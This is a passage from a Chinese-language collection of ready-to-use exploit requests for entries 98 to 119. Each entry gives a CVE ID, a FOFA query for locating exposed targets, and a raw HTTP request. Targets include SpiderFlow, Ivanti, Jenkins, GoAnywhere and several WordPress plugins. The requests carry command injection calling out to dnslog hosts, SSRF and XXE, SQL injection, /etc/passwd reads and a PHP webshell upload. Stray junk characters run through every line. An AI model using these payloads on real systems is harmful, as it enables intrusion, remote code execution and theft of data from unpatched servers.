1 w8 t# o/ g# T98. SpiderFlow爬虫平台远程命令执行8 y5 F/ X4 R% u
CVE-2024-0195, d: o; @9 d5 v( ?3 F
FOFA:app="SpiderFlow"7 A9 H3 \, T% u3 r3 |( [
POST /function/save HTTP/1.1
$ z1 b/ |- @' k. [Host: 192.168.40.130:8088
4 l9 j; H [ ~% A( s% N( HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 }! p1 u+ y7 jConnection: close
5 `& A; y1 l, k' S( F/ ?* W; }Content-Length: 121
- X' A( e: C. R; c! NAccept: */*
: F; X9 b( H; d, V' l$ L' tAccept-Encoding: gzip, deflate
?- c; s9 O" r, s2 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! z# J. x: O/ r/ a8 aContent-Type: application/x-www-form-urlencoded; charset=UTF-8$ I% u' K9 X: n( T0 G; |
X-Requested-With: XMLHttpRequest
# r- W2 Z) n1 s1 `! R* ^9 O$ V* a0 c
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B* n9 u0 G' \, @8 j, o3 {
% N$ N) b% h/ ]; @1 }2 ?: M! \8 y d) i. ?+ y' A8 {
99. Ncast盈可视高清智能录播系统busiFacade RCE- Q& R& J$ Q4 B% z) e4 h4 X
CVE-2024-0305" w9 T3 Y4 y& w2 b$ _; C
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
9 _. p2 n6 S S- j& n1 APOST /classes/common/busiFacade.php HTTP/1.1& O* S: \7 w3 n4 b6 g- W/ m
Host: 192.168.40.130:8080 I, ]4 H: ~4 O8 i5 b( B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- H. ]! t! s, V& [, d
Connection: close
: Y( n+ R9 R8 @6 Z% M1 E t8 YContent-Length: 154 @' W4 x, V K5 O- q
Accept: */*
& E7 O/ [. R1 t- gAccept-Encoding: gzip, deflate3 @7 R$ c: X+ q5 Z+ z5 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, d- ]! ]/ a9 N% E6 TContent-Type: application/x-www-form-urlencoded; charset=UTF-8+ \ S$ s$ L9 [+ d
X-Requested-With: XMLHttpRequest
. d* u$ d1 |/ W' L+ Z
- |% k& X7 H c3 t, `1 t7 V& ?%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
O& r3 r( ]( k' _
3 F8 n% ^: T- W" e. z y0 _9 t0 Q9 p9 v+ Z; T
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传/ `7 X6 p4 H5 H
CVE-2024-0352& ]; c1 b3 X$ _! H
FOFA:icon_hash="874152924"5 S3 }& C$ H# b9 J9 V' f* P* D
POST /api/file/formimage HTTP/1.1, |4 T' \; J4 q$ }. K, N
Host: 192.168.40.130
8 g% W U4 T) ]6 W( H: S# \9 O7 UUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.362 v6 x* u' Y" l
Connection: close6 N1 W4 Y- I- D% j3 c1 j, g- Z. O' v% P
Content-Length: 2012 e8 ^3 i# _% g N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei; C6 E2 m! N d+ \" Z
Accept-Encoding: gzip
# k# N+ j- i; R! t: r7 O* o
7 V2 |6 l$ ?$ i' ]! j0 V& I------WebKitFormBoundarygcflwtei
6 @0 }. n5 k* AContent-Disposition: form-data; name="file";filename="IE4MGP.php"
1 u( _6 l+ r- ZContent-Type: application/x-php/ M# y5 } z4 F* O3 M3 z6 P/ S3 c
& ?1 y6 {2 t- I8 \8 H3 O `
2ayyhRXiAsKXL8olvF5s4qqyI2O6 R8 ]2 [, u' r3 ~9 f; h% W
------WebKitFormBoundarygcflwtei--
' @5 m+ |! D/ j8 G
3 R4 q( g/ Y) T4 s5 {% ` x8 t" q
' B# v5 p& D+ Y& l4 y! z101. ivanti policy secure-22.6命令注入
9 M3 k: L& p; F& T9 y* MCVE-2024-21887: W6 N: J1 F% V- \* ^4 u
FOFA:body="welcome.cgi?p=logo"% q0 n7 C9 t# W
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.10 K+ k" G6 P/ |4 r J. t
Host: x.x.x.xx.x.x.x
) }, T! U: t) w6 p0 w( N" ?! n" b3 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 S6 O3 L O& {0 H
Connection: close
+ i- A$ ~+ V" _" S/ B* f4 K: E4 @0 J SAccept-Encoding: gzip
. x$ k5 I! x' Q3 l) ?. L
+ ]/ X4 c9 A" V: t7 j0 s7 z8 \5 Y
( u! S0 e; F5 n: V102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
/ t3 Z# T$ C3 u7 E% @CVE-2024-218930 d0 f7 s9 g) o
FOFA:body="welcome.cgi?p=logo"& n, V l0 P, w2 D9 w
POST /dana-ws/saml20.ws HTTP/1.1
4 m6 d+ K; Y0 M ?. g, c8 N* ZHost: x.x.x.x
5 M% q* a& f" q$ T* g$ w' ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# p6 {. @. L& W& h) v
Connection: close
! j( z5 p5 I& m' xContent-Length: 792
8 q- c7 ]. v; f: j0 U; Q* TAccept-Encoding: gzip5 b( ^ m4 m0 g% ^- V
' }# x6 [; O2 h6 M& t1 g! |
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>; a9 z8 D$ v3 b* |% _1 q6 C* ]+ q
( b6 R1 h- G+ `2 I: x& h103. Ivanti Pulse Connect Secure VPN XXE9 y9 }( `9 Q: j# L0 Q5 D
CVE-2024-22024
5 m$ {0 G7 v5 S0 g# B dFOFA:body="welcome.cgi?p=logo"
# B3 M6 v) o6 h6 W8 Z* t) GPOST /dana-na/auth/saml-sso.cgi HTTP/1.1% g6 K0 u! C( T$ N4 d+ B( L
Host: 192.168.40.130:111
) ]( C- G) ?$ ~3 ]User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
# i- d2 ^7 `3 B, TConnection: close
0 R( X3 ~ }2 C! \Content-Length: 204, ^; A: ]1 N+ ? u+ L2 C" X
Content-Type: application/x-www-form-urlencoded
( q& K& [" m9 r; L. PAccept-Encoding: gzip
% g% K8 H9 g- i, c6 N+ _' v- n
6 W* J9 I4 G% a u! L4 L2 c0 BSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==% M) y# Z [* O N- G9 B3 R
' P" k, u) Q$ c/ g/ Q7 L- K+ f( T! D! e( R/ M
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
2 |3 V e- f& G* s<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
# Y3 R) k2 K5 B* p/ ~$ h- B8 g: R
9 G! L [/ z% _104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 X8 ~/ k4 M8 `. _" E1 K9 u
CVE-2024-0569
" R" |9 V9 r# Z& H3 S4 dFOFA:title="TOTOLINK"
7 s9 n% }5 i2 o6 m [4 dPOST /cgi-bin/cstecgi.cgi HTTP/1.1
# z N5 f5 p \; {Host:192.168.0.1
4 l% u1 W |# ^2 }: q7 {$ x: G9 TContent-Length:417 y# O6 k" X, r) j1 w( o
Accept:application/json,text/javascript,*/*;q=0.01
3 z& Z& Q' F* v/ Z) VX-Requested-with: XMLHttpRequest
5 _: J( W3 q a# V$ r+ SUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.361 u' B1 {0 m( ]3 M
Content-Type: application/x-www-form-urlencoded:charset=UTF-81 ?0 [) T& g, |3 o
Origin: http://192.168.0.1
5 y3 q# {4 r, W3 TReferer: http://192.168.0.1/advance/index.html?time=1671152380564( [/ ~+ [! p; ?$ d' z
Accept-Encoding:gzip,deflate
: l' P9 e8 S! I+ L9 u0 GAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7" V) l* a5 Z5 J% \
Connection:close
! `" T7 F. l4 [ K L$ I3 m7 ^& H5 t
{& w0 p- N! X& k- J+ q* e) f/ ^9 M
"topicurl":"getSysStatusCfg",
B% }7 k4 Z. \: k1 E+ w+ R"token":""4 V2 D: g) T1 F- j' H
}
# ]. G; p# Y7 O! P$ ? h" [
" H: N% b( u: Q( i/ z105. SpringBlade v3.2.0 export-user SQL 注入
* `+ M: u8 O3 m8 \FOFA:body="https://bladex.vip"
. e1 V# K! ^& Y$ [http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1( w' L5 c+ U. ?! S
9 I$ @; J: F, p1 K7 o
106. SpringBlade dict-biz/list SQL 注入
4 @" _' @' f6 I6 d. _9 Z& OFOFA:body="Saber 将不能正常工作"- F" @$ f! x, |) U% @
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1$ \$ I5 J4 _9 ^1 {* H! J! a. V
Host: your-ip
/ D+ i. s6 W4 W) O0 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 U# F" \1 M/ R- p- q" s9 C6 ^* yBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
' b% E: p5 H D" }9 Y6 k9 k. HAccept-Encoding: gzip, deflate
) X0 C) n! A/ ?! C) UAccept-Language: zh-CN,zh;q=0.9* Z; E0 Q/ a9 H2 w, S- _
Connection: close0 x: k0 M3 p6 {+ O% `9 \/ \
, w( C) }- \* d) v8 v* U1 s
g2 K0 |0 i; G( ^9 b" g% m$ {107. SpringBlade tenant/list SQL 注入. r' O n% Y' n5 G( P
FOFA:body="https://bladex.vip"
1 V$ k4 Q/ v( j. b! kGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1: H* o$ F. ]9 B/ Z& A8 `8 T
Host: your-ip
4 i/ u6 p( m# Z, JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 w) ]$ i: r! ^. r
Blade-Auth:替换为自己的
( n: ]$ a, d" j% v4 iConnection: close# V5 o0 S! y; t8 C! H6 ]
+ F* ^, d% c; @$ e6 k- N* c
$ R) Z* N$ p- Y108. D-Tale 3.9.0 SSRF( E1 D# h& M2 @0 @' U
CVE-2024-21642" X5 ]0 z' ~8 {. L3 v( V* H
FOFA:"dtale/static/images/favicon.png"
`, ^1 j+ e7 `) q0 F9 A- \GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1* \9 i$ b7 s# m6 v: ^9 U1 p. e
Host: your-ip% _8 K$ d ~4 ^5 @- {+ X0 W$ c, \6 H
Accept: application/json, text/plain, */*
! T7 r1 s) _: C. _& `/ N+ Z+ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ e2 t# O$ c& J% U: UAccept-Encoding: gzip, deflate( w! x' P% Y ]: G
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
j( c# r8 X8 GConnection: close
9 u9 o9 v* n( h9 ]; O& C6 G' Q/ B: _2 B& O8 f
p2 l* T# [% ^* v109. Jenkins CLI 任意文件读取
0 @7 Q3 Z; |9 a, H" ^& } s4 iCVE-2024-23897
; `. F" B" q( V0 V$ b, M' @FOFA:header="X-Jenkins"8 |0 D2 v0 [- d' k% X
POST /cli?remoting=false HTTP/1.1# d$ e* B0 T9 G
Host:
. y, z; Y; [7 N8 G6 g: bContent-type: application/octet-stream
- c! M# {, b& L5 `: r( FSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
& V8 `/ Y4 f2 D/ u: g2 D4 i$ X% qSide: upload
% n: t/ L* V6 M2 T- `9 a* |: IConnection: keep-alive
2 ^. U6 [/ v8 K! z+ e* JContent-Length: 163
+ j& ?6 c* o/ p, w4 m5 n; n# N% T9 v$ b. s
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
) U1 E+ y# Y4 V; M6 K3 w5 ^& s! |3 a# I+ [' V
' R( s6 c) `3 o, v
POST /cli?remoting=false HTTP/1.1
8 T2 M) a+ s/ [, ^Host:' ~5 ?) O3 c$ t0 D
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92) e' W5 A n& z
download6 J& d- c( D% g" f. \
Content-Type: application/x-www-form-urlencoded
; \% R' L3 q3 N$ N. I7 ^' ?Content-Length: 0) E; j3 W8 w1 L' ^* h
0 {9 Z! o; {3 r4 n8 r& {( \; F2 d5 e6 q- C. O$ R3 F, A
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
8 `$ e/ |. Q) J/ k" [$ Wjava -jar jenkins-cli.jar help; E0 L: W F# L& R5 ~, u. y
[COMMAND]
/ c0 \* u; M) ]! s! ALists all the available commands or a detailed description of single command.# q( {6 c$ E% ~$ j/ k
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
" V J V9 U- L) a/ Z. [; s
1 X6 }% L6 W, }6 } R
! G, w7 Z1 Y3 R* Z110. Goanywhere MFT 未授权创建管理员
, [4 ? ^' M; PCVE-2024-0204, u1 {: s" ^" j$ t' h" s
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
1 c" e' z% n* ~- uGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1+ O; |8 i2 z: d( n
Host: 192.168.40.130:8000, Z& Q/ t9 \1 s* M! Y6 ^- a: \
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
$ l) Q% `) Y1 S8 e0 {Connection: close2 l3 C7 p- O! `6 x/ z
Accept: */*# d1 |9 y/ l4 m# m
Accept-Language: en7 o7 p( U4 y. _% a3 j% |
Accept-Encoding: gzip
0 Q4 W+ M1 r3 _! Z5 M7 R
/ ^# }! a3 a- l+ T
) u% Y4 M, U7 F- w8 E: k: s$ O/ K6 i111. WordPress Plugin HTML5 Video Player SQL注入9 p+ ?; G6 V: c8 V E5 O
CVE-2024-10617 R/ f! E3 c. f; [+ t
FOFA:"wordpress" && body="html5-video-player"
6 o4 I; _: T9 ?1 Z- h. A- Q# C/ PGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
' s' x* J. F/ c- ?6 a9 d3 e$ _Host: 192.168.40.130:1128 X$ ?( `; x1 p6 T% E% |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% k# X. C, c; o8 }2 w U
Connection: close+ A( o' h! c8 k1 [- J( _+ j
Accept: */*
9 t- L! J3 w- j1 S8 ]# I+ a. h& SAccept-Language: en
% }% G1 @- E- M7 {5 e f; yAccept-Encoding: gzip& ~6 B r& h# j+ i- u) y7 v( Z
' O6 D# L4 Y; Y' r" F2 c
, B0 g; Z2 E/ `7 `1 W7 ] z: x7 [112. WordPress Plugin NotificationX SQL 注入
5 g+ e: f% N9 xCVE-2024-1698
7 K( g$ f3 l0 BFOFA:body="/wp-content/plugins/notificationx"5 b' B' q- F0 w4 g Z
POST /wp-json/notificationx/v1/analytics HTTP/1.1
9 D5 a& P: o* V$ P: o7 C/ r# lHost: {{Hostname}}
+ j6 ^; o, o2 y- l4 f; F4 X UContent-Type: application/json
4 F6 W0 w6 y4 J8 ]" v) v9 |2 g+ w7 B8 u4 Q
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}- Q) ^$ }* j$ t! I* H
- U* I1 l* x" D4 p/ t
+ D4 R! H4 f6 W7 L113. WordPress Automatic 插件任意文件下载和SSRF
3 V- F0 W" E5 |CVE-2024-27954
5 i8 A$ Y3 C4 f" T, t; mFOFA:"/wp-content/plugins/wp-automatic"
u+ Z& p$ w$ e9 Z8 q2 d8 oGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1, Z1 G4 b% P" i/ L1 R0 e) K
Host: x.x.x.x* V! K+ H) p4 B2 N* N* {
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.361 }& U+ \. m2 t+ @9 P" w
Connection: close
4 v, r# |8 h8 z( L8 jAccept: */*
( q9 t: I* e! o- ^4 nAccept-Language: en
0 M5 J/ e+ u; ?$ B: K: eAccept-Encoding: gzip
' [' \3 S6 Q% o/ ] B3 b/ C& n+ Q0 K( A/ Q5 L
2 f# \' N/ N$ o
114. WordPress MasterStudy LMS插件 SQL注入
9 p# h3 h. d- \4 u B2 v: LFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"5 e0 U- x0 z; I [
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.13 J4 A) q9 r; R/ `$ y
Host: your-ip
& V* l, C! u6 E' C# cUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. f+ e+ b3 c' t/ @( kAccept-Charset: utf-8) Y9 X7 v- \7 [2 m9 i" @
Accept-Encoding: gzip, deflate
. B, _- z4 Q# c, E pConnection: close
) d* ]7 K. C, V/ g7 x' Y9 W U
) z( {! d9 u6 }
3 n; X: f. O- T$ W5 a115. WordPress Bricks Builder <= 1.9.6 RCE
3 y' a0 k, ~* R& w9 SCVE-2024-25600, e, _: V( ^0 a( a [
FOFA: body="/wp-content/themes/bricks/"4 D5 T# A8 Z4 Q/ H+ T8 ?6 }3 F
第一步,获取网站的nonce值
3 R: b6 R# x1 Y; R" \GET / HTTP/1.1) Y2 E4 H5 [: a8 X* E7 K
Host: x.x.x.x0 A( d+ h) b7 W5 e, r6 s: O4 a
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36. _8 ]% v+ k# R0 v; q
Connection: close
7 ?' X) L# S5 a1 ^Accept-Encoding: gzip, G+ n" E% h& I: a
+ F" R0 J" i/ ]2 d5 s
) \0 T g0 H- _第二步替换nonce值,执行命令8 ^. h! m2 H8 U+ ^! T" M
POST /wp-json/bricks/v1/render_element HTTP/1.1
' r* y! c) K. ~! J4 YHost: x.x.x.x2 ]6 Q- Y$ \4 A% X* c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 |* c' Y: h. t. e
Connection: close
: }' D+ O) ?2 x' A$ |" rContent-Length: 356
% A: ^- X+ @( ~- M5 WContent-Type: application/json5 P1 o, p, d: l2 H! }8 i/ O8 Q. {
Accept-Encoding: gzip0 S% {6 w U4 g
- d) v3 z9 {4 `4 q Z' l0 g
{
3 M8 d3 r1 o/ x' w0 ]2 T! }! v"postId": "1",) ~) R( {2 [' m4 j. f
"nonce": "第一步获得的值",
9 d1 x, C6 {0 V% ]0 @ "element": {
y' {$ ^1 Q3 x) f: M- q "name": "container",3 O2 w) O" X0 V Q: t5 K& g
"settings": {
8 }% ~, O# e; r1 r- {: q9 @ "hasLoop": "true",! W2 w6 {+ e+ ^* z5 S5 L5 N
"query": {* X9 u* t! E9 w. w$ L
"useQueryEditor": true,
8 L+ R1 @! H8 u, n, g "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
1 Y; L2 H. Q0 P, L! D0 y. S* U "objectType": "post"6 W& H0 K9 F4 ?* l, o( X* g
}5 k( w. V6 B o
}* ], a5 H& K9 ?$ e( _
}0 p! B* ?2 j9 V5 a- ^1 w
}
3 J4 z6 Q6 g1 U4 R3 T9 K" y4 n1 p w. V6 Z: C( a" y6 ]
" b6 z& ]5 P. y/ i) Q% J" V
116. wordpress js-support-ticket文件上传
! z( W/ U7 f# j" o" H# G- _: gFOFA:body="wp-content/plugins/js-support-ticket"
& z) w3 p! G$ o1 YPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
4 |" |& I C- v* ?; eHost:. f+ n: S0 W& V% s. x4 Y9 N& d
Content-Type: multipart/form-data; boundary=--------767099171
- ?' S4 c+ z3 U' {* f; |User-Agent: Mozilla/5.0
0 k0 B) D3 t1 q: _6 |' r8 L4 G9 O9 y+ A1 i; ?/ m5 r& }
----------767099171, Q1 Q q/ X3 O7 B( M3 F5 f
Content-Disposition: form-data; name="action"
9 Y9 B% q8 `+ E( R& R% _' a: U }configuration_saveconfiguration' ~) R7 f3 ~5 G" x6 s9 f2 g
----------767099171
! d$ z" S3 H z' i3 D! ^Content-Disposition: form-data; name="form_request"- y! T- q. L$ `, O/ O
jssupportticket
1 w% ?8 R W: m) M& g----------767099171" `1 [' H5 f9 A+ u) ~' O# e# {
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
* K: s; `" z* Q' ?/ k/ ]9 a5 Z! MContent-Type: image/png8 k0 p! X4 m7 b3 n1 \
----------767099171--
* A" a& J* _* w% x
% O$ m' b) e0 {3 S1 V0 u
( w2 X5 a+ e! J/ E5 e117. WordPress LayerSlider插件SQL注入' p. M3 x4 P1 l; q
version:7.9.11 – 7.10.06 J0 A- e( b2 f8 {* f; n
FOFA:body="/wp-content/plugins/LayerSlider/". ]) H: X7 c g7 n8 i8 x" r
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
- c1 @% Z$ b. ?+ ~ HHost: your-ip4 ^* G7 d! y1 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- v8 ~+ M- |- o7 H) M3 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 x( d+ D. D4 }: o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. v# @( d4 _$ T' MAccept-Encoding: gzip, deflate, br
2 U# ?: s! K3 S2 O5 A/ oConnection: close/ ?' j0 O# g" t; j) D
Upgrade-Insecure-Requests: 1( W6 g* r! u- ]0 _9 k' S
8 k+ o- z* s( S3 {
* b# u" E1 H' ^0 O; O3 W+ K1 A2 L
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ l& ~! h+ R& lCVE-2024-0939
" V2 X8 t D( T' c3 u t9 B- B+ oFOFA:title="Smart管理平台"% I) A5 x4 I7 Q9 } R5 S8 ?
POST /Tool/uploadfile.php? HTTP/1.17 p( g, V7 t, Z* a* { R
Host: 192.168.40.130:8443
/ e4 \1 W5 R: h YCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
2 W6 U1 z1 Q3 o0 f7 x" SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0$ ^$ A( y; Y' `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ y- N+ v$ f! e& l2 z* s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# _% x5 i% o8 l$ K p8 `- U- |! r
Accept-Encoding: gzip, deflate% O0 O2 D# D( x% ]
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
4 _, k. C. V! g* |6 U6 tContent-Length: 405) i$ e' ?9 A( Q" L
Origin: https://192.168.40.130:8443
9 Y! `, O3 L. T1 j% u" P8 B8 S+ I4 YReferer: https://192.168.40.130:8443/Tool/uploadfile.php
/ u1 U8 _/ w( a* PUpgrade-Insecure-Requests: 1
. I2 m N6 C- V" L, N: iSec-Fetch-Dest: document
2 A6 A! A }0 q1 @Sec-Fetch-Mode: navigate
6 `. b& J; g; T2 o6 I' H* NSec-Fetch-Site: same-origin
& O) w- s0 \" WSec-Fetch-User: ?1
7 o0 l. X' j$ o; G. W* KTe: trailers
+ a! R2 B- u* B+ ]Connection: close- f3 i* U) @- I; z/ ^0 u& ^: T U
' z: `+ E9 F2 Q; P9 ]8 Z1 J; b-----------------------------13979701222747646634037182887
6 C& Z* W! k7 A$ C5 F3 O$ _- ?' c1 MContent-Disposition: form-data; name="file_upload"; filename="contents.php"* r$ r; \) D- |) l
Content-Type: application/octet-stream+ s7 F- o2 ~+ U Y
$ [& L6 P/ ~# ]( k
<?php
) ^. R1 h. ?# A* C& Tsystem($_POST["passwd"]);/ I9 \* m* J% l# A. p! ~$ w0 e
?>
% P/ \8 p- d0 v6 o* f4 ?-----------------------------139797012227476466340371828878 O! I' }/ f" E% r8 ]* \9 H- t
Content-Disposition: form-data; name="txt_path". B. z2 ~4 M* i$ d1 \) \
: J' p# t! a9 r% F# W9 U5 n
/home/src.php# C& n" f% x* [! C
-----------------------------13979701222747646634037182887--# r) I( e3 ~& y8 Y2 R" b
, M& A: f" K: N( O
; P# ^" \, x3 Z. D; a访问/home/src.php! @$ J: n4 D/ q" V
R7 {* b I, G$ T6 c, M5 l119. 北京百绰智能S20后台sysmanageajax.php sql注入1 B* ~! H( f$ U' O
CVE-2024-1254; i/ K. Q2 H: _6 {- V. R
FOFA:title="Smart管理平台", R" S) \9 n7 \6 ^! s# T; b% F
先登录进入系统,默认账号密码为admin/admin
# N; T& P d4 F& |POST /sysmanage/sysmanageajax.php HTTP/1.11
/ w- x' ?# J9 R0 `$ n8 qHost: x.x.x.x
) L0 J, e# U1 WCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
0 H, N x# |( G4 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
" L; B1 N' U& l0 Z4 A$ |Accept: */*
, L* r! }5 s$ L4 D$ a6 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
e6 E& N& G8 J2 J: ^3 v. rAccept-Encoding: gzip, deflate
/ o4 J% V G6 G7 K# M L; M4 }Content-Type: application/x-www-form-urlencoded;( z. b2 N5 R- s. Y7 a9 B
Content-Length: 109
